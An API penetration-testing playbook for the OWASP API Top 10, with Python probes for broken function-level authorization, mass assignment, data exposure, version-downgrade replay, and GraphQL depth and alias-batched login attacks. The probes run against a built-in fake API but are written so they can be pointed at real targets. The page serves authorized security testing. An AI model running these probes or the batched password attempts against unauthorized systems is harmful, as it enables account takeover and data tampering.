Pentest API Deep
Purpose
Perform dedicated API-specific vulnerability testing beyond basic BOLA/GraphQL coverage. Addresses Broken Function Level Authorization (BFLA), mass assignment, rate limiting, excessive data exposure, and unsafe consumption per OWASP API Security Top 10 (2023).
Prerequisites
Authorization Requirements
- Written authorization with API testing scope explicitly included
- API documentation (OpenAPI/Swagger specs, GraphQL schema) if available
- Test accounts at multiple privilege levels (user, admin, service account)
- Rate limit awareness — confirm acceptable request volume with target owner
Environment Setup
- Postman or Insomnia for manual API exploration
- Burp Suite with API-specific extensions
- GraphQL Voyager for schema visualization
- grpcurl for gRPC service testing
Core Workflow
- API Discovery: Enumerate endpoints via OpenAPI/Swagger specs, GraphQL introspection, gRPC reflection, traffic analysis. Discover undocumented endpoints with Kiterunner.
- BFLA Testing: Access admin-only API functions as regular user. HTTP method switching (GET→DELETE). Test function-level authorization gaps distinct from object-level (BOLA).
- Mass Assignment: Send extra fields in POST/PUT (role, isAdmin, balance). Check response objects for leaked internal fields (WSTG-INPV-20).
- Rate Limiting & Resource Consumption: Test missing or per-request-only rate limits, GraphQL depth/complexity and alias-batching abuse, pagination abuse (unbounded page sizes), regex DoS via API input.
- Excessive Data Exposure: Compare API responses across privilege levels. Identify fields returned but not displayed in UI. Test verbose error responses.
- Unsafe Consumption: SSRF through upstream API calls, injection through trusted-but-tainted API response data.
- API Versioning: Old API versions with weaker controls, version header manipulation, deprecated endpoint access.
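Worked example for the BFLA, mass assignment and excessive data exposure steps above. This is an added example, not code from this page's referenced tooling: the target (`fake_api`), its tokens, endpoints and defects are constructed in-memory stand-ins so the file runs offline. To use it against a real API, replace `fake_api` with a wrapper around an HTTP client that returns `(status, json)` and keep the probes as they are.

```python
"""Privilege-differential probes for the BFLA, mass assignment and excessive
data exposure steps of the workflow. Added example, not part of this page's
tooling. The API under test is a constructed in-memory stand-in so the file
runs offline; `send` has the shape a thin HTTP-client wrapper would have."""
import json

# Constructed target with three deliberate defects the probes should surface:
#  1. DELETE /api/users/<id> never checks the caller's role (BFLA; reachable by
#     switching the method on a GET the user is allowed to make)
#  2. PUT /api/users/<id> writes every known column found in the body,
#     including role and balance (mass assignment)
#  3. GET /api/users/<id> returns password_hash to any caller (excessive exposure)
TOKENS = {"admin-token": "admin", "user-token": "user"}
USERS = {"7": {"id": "7", "name": "alice", "role": "user", "balance": 10,
               "password_hash": "$2b$12$constructed"}}
WRITABLE_COLUMNS = ("name", "role", "balance")   # isAdmin is not a column


def fake_api(method, path, token, body=None):
    """Return (status, json_dict) the way a JSON REST API would."""
    role = TOKENS.get(token)
    if role is None:
        return 401, {"error": "unauthorized"}
    if path == "/api/admin/audit" and method == "GET":
        return (200, {"events": []}) if role == "admin" else (403, {"error": "forbidden"})
    if path.startswith("/api/users/"):
        user = USERS.get(path.rsplit("/", 1)[1])
        if user is None:
            return 404, {"error": "not found"}
        if method == "GET":
            return 200, dict(user)
        if method == "PUT":
            for col in WRITABLE_COLUMNS:          # no per-role allow-list
                if col in (body or {}):
                    user[col] = body[col]
            return 200, dict(user)
        if method == "DELETE":                    # missing `if role != "admin"`
            return 204, {}                        # record kept so later probes run
    return 404, {"error": "not found"}


def bfla_probe(send, admin_only_calls, low_token):
    """Replay calls only the admin account should be able to make, using a
    lower-privilege token. Any 2xx is a function-level authorization finding."""
    hits = []
    for method, path in admin_only_calls:
        status, _ = send(method, path, low_token)
        if 200 <= status < 300:
            hits.append((method, path, status))
    return hits


METHOD_SWAPS = ("PUT", "PATCH", "DELETE")

def method_switch_probe(send, allowed_get_calls, token):
    """For each GET the token may legitimately make, try mutating methods on the
    same path. 2xx results are candidates: triage whether the object is the
    caller's own (expected) or the method should have been admin-only."""
    hits = []
    for _, path in allowed_get_calls:
        for method in METHOD_SWAPS:
            status, _ = send(method, path, token)
            if 200 <= status < 300:
                hits.append((method, path, status))
    return hits


def mass_assignment_probe(send, path, token, legit_body, extra_fields):
    """PUT the legitimate body plus attacker-chosen fields; report which of them
    the server persisted (echoed back with the injected value). Use a
    disposable record: on a vulnerable API this really changes state."""
    status, resp = send("PUT", path, token, {**legit_body, **extra_fields})
    if status != 200:
        return []
    return sorted(k for k, v in extra_fields.items() if resp.get(k) == v)


SENSITIVE_HINTS = ("password", "hash", "secret", "token", "ssn", "internal")

def exposure_probe(send, path, low_token, high_token):
    """Fetch the same object at two privilege levels: flag sensitive-looking
    fields the low-privilege caller receives, and list fields only the
    high-privilege view contains (confirm against the UI what is needed)."""
    low = send("GET", path, low_token)[1]
    high = send("GET", path, high_token)[1]
    return {"sensitive_to_low": sorted(k for k in low
                                       if any(h in k.lower() for h in SENSITIVE_HINTS)),
            "admin_only": sorted(set(high) - set(low))}


def run_all(send=fake_api):
    return {
        "bfla": bfla_probe(send, [("GET", "/api/admin/audit"),
                                  ("DELETE", "/api/users/7")], "user-token"),
        "method_switch": method_switch_probe(send, [("GET", "/api/users/7")], "user-token"),
        "mass_assignment": mass_assignment_probe(
            send, "/api/users/7", "user-token", {"name": "alice"},
            {"role": "admin", "isAdmin": True, "balance": 999999}),
        "exposure": exposure_probe(send, "/api/users/7", "user-token", "admin-token"),
    }


if __name__ == "__main__":
    print(json.dumps(run_all(), indent=2))
```

The probes take the request function as a parameter on purpose: the same code runs against the stand-in here and, with a real client, against the target, and every 2xx it reports is a candidate to verify by hand rather than an automatic finding.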
OWASP API Security Top 10 (2023) Coverage
| Category | Test Focus | Status |
|---|---|---|
| API1 Broken Object Level Authorization | IDOR via API params | ✅ |
| API2 Broken Authentication | Token/key weaknesses | ✅ |
| API3 Broken Object Property Level Authorization | Mass assignment, excessive data | ✅ |
| API4 Unrestricted Resource Consumption | Rate limits, complexity | ✅ |
| API5 Broken Function Level Authorization | BFLA, method switching | ✅ |
| API6 Unrestricted Access to Sensitive Business Flows | Automation abuse | ✅ |
| API7 Server Side Request Forgery | API-triggered SSRF | ✅ |
| API8 Security Misconfiguration | CORS, headers, versioning | ✅ |
| API9 Improper Inventory Management | Shadow APIs, deprecated versions | ✅ |
| API10 Unsafe Consumption of APIs | Upstream injection, SSRF via third-party responses | ✅ |
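Worked example for the API Discovery and API Versioning steps and the API9 (Improper Inventory Management) row: build the operation inventory from an OpenAPI 3 document, pull out unauthenticated and deprecated operations, and generate the version-downgrade candidates to replay against. Added example, not code from this page's tooling; `SPEC` is a small constructed document, `api.example.test` is a placeholder host, and the `VERSION_HEADERS` names are an assumption about how some gateways select a version, to be confirmed per target.

```python
"""Endpoint inventory and version-downgrade candidates from an OpenAPI 3
document. Added example for the discovery and versioning steps; SPEC is a
small constructed document, not any real API's."""
import re

SPEC = {
    "openapi": "3.0.3",
    "servers": [{"url": "https://api.example.test/v2"}],
    "security": [{"bearer": []}],          # document default: bearer token required
    "components": {"securitySchemes": {"bearer": {"type": "http", "scheme": "bearer"}}},
    "paths": {
        "/users/{id}": {"get": {"operationId": "getUser"},
                        "delete": {"operationId": "deleteUser"}},
        "/export": {"get": {"operationId": "exportAll", "deprecated": True}},
        "/internal/debug": {"get": {"operationId": "debugDump",
                                    "security": []}},   # overrides default: no auth
    },
}
HTTP_METHODS = ("get", "put", "post", "delete", "options", "head", "patch", "trace")
VERSION_RE = re.compile(r"/v(\d+)(?=/|$)")
# Header names some gateways use to select a version instead of the path.
# Assumption: which of these, if any, a target honours must be confirmed.
VERSION_HEADERS = ("X-API-Version", "Accept-Version")


def inventory(spec):
    """One row per operation. An operation-level `security` key overrides the
    document default, and an empty list means no authentication at all."""
    default = spec.get("security", [])
    rows = []
    for path, item in spec.get("paths", {}).items():
        for method in HTTP_METHODS:
            op = item.get(method)
            if op is None:
                continue
            rows.append({"method": method.upper(), "path": path,
                         "operationId": op.get("operationId"),
                         "authenticated": bool(op.get("security", default)),
                         "deprecated": bool(op.get("deprecated", False))})
    return rows


def unauthenticated(spec):
    return [(r["method"], r["path"]) for r in inventory(spec) if not r["authenticated"]]


def deprecated(spec):
    """Deprecated operations stay live until someone removes them; test them."""
    return [(r["method"], r["path"]) for r in inventory(spec) if r["deprecated"]]


def version_variants(base_url):
    """Every older version, one newer one, and the unversioned base. A non-404
    from any of these is a second API surface the spec does not list."""
    m = VERSION_RE.search(base_url)
    if not m:
        return []
    current = int(m.group(1))
    targets = [f"/v{n}" for n in range(1, current)] + [f"/v{current + 1}", ""]
    return [VERSION_RE.sub(t, base_url, count=1) for t in targets]


def replay_plan(spec):
    """(method, url, headers) triples to replay: every operation against every
    path variant, plus the documented base with each version header set to
    each older version number. Path templates such as {id} still need values."""
    base = spec["servers"][0]["url"]
    m = VERSION_RE.search(base)
    older = range(1, int(m.group(1))) if m else range(0)
    plan = []
    for row in inventory(spec):
        for url in version_variants(base):
            plan.append((row["method"], url + row["path"], {}))
        for n in older:
            for header in VERSION_HEADERS:
                plan.append((row["method"], base + row["path"], {header: str(n)}))
    return plan


if __name__ == "__main__":
    print("unauthenticated:", unauthenticated(SPEC))
    print("deprecated:", deprecated(SPEC))
    for method, url, headers in replay_plan(SPEC):
        print(method, url, headers or "")
```

Feed the replay plan to the same request wrapper used for the authorization probes; anything other than 404 on an older version or on the unversioned base is an inventory finding to compare against the current version's controls.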
Tool Categories
| Category | Tools | Purpose |
|---|---|---|
| API Discovery | Kiterunner, Swagger UI, GraphQL Voyager | Endpoint enumeration |
| Parameter Discovery | Arjun, x8, ParamSpider | Hidden parameter detection |
| Fuzzing | ffuf, Burp Intruder, custom scripts | Mass assignment, BFLA |
| GraphQL | graphql-cop, InQL, BatchQL | GraphQL-specific attacks |
| gRPC | grpcurl, grpc-tools | gRPC reflection and testing |
| Rate Testing | custom aiohttp scripts, Turbo Intruder | Rate limit verification |
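Worked example for the GraphQL depth/complexity and rate-limit rows above and the "GraphQL depth/complexity abuse" workflow step: generators for the two documents a tester sends (a deeply nested query and an alias-batched mutation, the BatchQL-style bypass of per-request rate limits), a depth counter, and a predictor of which limit a correctly configured server should trip. Added example, not code from this page's tooling; the schema fields `me`, `friends` and `login` are assumed names, not taken from any real target.

```python
"""Test-vector generators for the GraphQL resource-consumption checks: deep
nesting (depth abuse) and alias batching (many resolver calls behind one HTTP
request, the technique BatchQL automates). Added example; the fields `me`,
`friends` and `login` are assumed schema names, not taken from a real target."""
import json
import re


def nested_query(depth, field="friends", leaf="id"):
    """Query whose selection depth is exactly `depth` (depth 1 is `me { id }`),
    recursing through a self-referencing field such as User.friends."""
    inner = leaf
    for _ in range(depth - 1):
        inner = f"{field} {{ {inner} }}"
    return f"query {{ me {{ {inner} }} }}"


def selection_depth(query):
    """Depth as a depth limiter counts it: nested selection sets below the
    operation's own braces. String literals are skipped so a brace inside an
    argument value is not counted."""
    depth = max_depth = 0
    in_string, prev = False, ""
    for ch in query:
        if ch == '"' and prev != "\\":
            in_string = not in_string
        elif not in_string and ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif not in_string and ch == "}":
            depth -= 1
        prev = ch
    return max_depth - 1


def alias_batch(operation, field, arg_sets, selection):
    """One document with len(arg_sets) aliased copies of `field`. A limiter that
    counts HTTP requests sees one call; every alias still runs the resolver."""
    parts = []
    for i, args in enumerate(arg_sets):
        rendered = ", ".join(f"{k}: {json.dumps(v)}" for k, v in args.items())
        parts.append(f"a{i}: {field}({rendered}) {{ {selection} }}")
    return f"{operation} {{ {' '.join(parts)} }}"


def alias_count(query):
    return len(re.findall(r"\ba\d+:", query))


def login_batch(username, passwords):
    """Many login attempts in one request: the rate-limit bypass to test for."""
    return alias_batch("mutation", "login",
                       [{"username": username, "password": p} for p in passwords],
                       "token")


def limiter_verdict(query, max_depth=10, max_aliases=20):
    """Which rules a correctly configured server should reject this document on.
    An empty answer from a live target for an over-limit query is the finding."""
    reasons = []
    if selection_depth(query) > max_depth:
        reasons.append("depth")
    if alias_count(query) > max_aliases:
        reasons.append("aliases")
    return reasons


if __name__ == "__main__":
    for q in (nested_query(12), login_batch("alice", [f"pw{i}" for i in range(25)])):
        print(limiter_verdict(q), q[:80] + "...")
```

Send the generated documents as the `query` member of a normal GraphQL POST and compare the server's answer with `limiter_verdict`: a 200 with full data for a document the verdict says should be rejected is the resource-consumption finding, and a successful alias batch that stays under the HTTP rate limit is the rate-limit bypass. The thresholds are illustrative defaults; take the real ones from the target's documentation or from where responses start to fail.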
References
references/tools.md - Tool function signatures and parameters
references/workflows.md - Attack pattern definitions and test vectors